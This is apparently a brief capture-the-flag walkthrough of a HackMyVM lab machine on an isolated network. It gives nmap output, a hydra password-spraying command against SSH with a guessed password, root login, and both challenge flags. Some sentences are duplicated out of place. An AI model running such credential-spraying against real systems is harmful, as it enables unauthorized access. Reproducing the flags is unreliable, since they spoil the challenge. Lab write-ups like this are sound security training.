ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN --
10.9.9.0/24 -- that has no internet accessNmap Results
# Nmap 7.94SVN scan initiated Thu Nov 14 14:54:16 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.12
Nmap scan report for 10.9.9.12
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 14:54:29 2024 -- 1 IP address (1 host up) scanned in 12.76 secondsService Enumeration
TCP/80

⚠️
I tried using
The "Its simple." phrasing on the web page makes me think that the password for an account might be
gobuster to discover any directories, files, or endpoints on the server, but kept coming up empty-handed. I also could not find anything with a nmap UDP scan either. The "Its simple." phrasing on the web page makes me think that the password for an account might be
simple. Since there are no login endpoints that I could find, we'll try some password spraying against SSH.TCP/22
echo -e 'gift\nsimple\nroot' > users.txt
hydra -I -f -V -L users.txt -p 'simple' ssh://10.9.9.12
Exploit
Becoming Root
ssh root@10.9.9.12
Flags
User
HMV665sXzDS
Root
HMVtyr543FG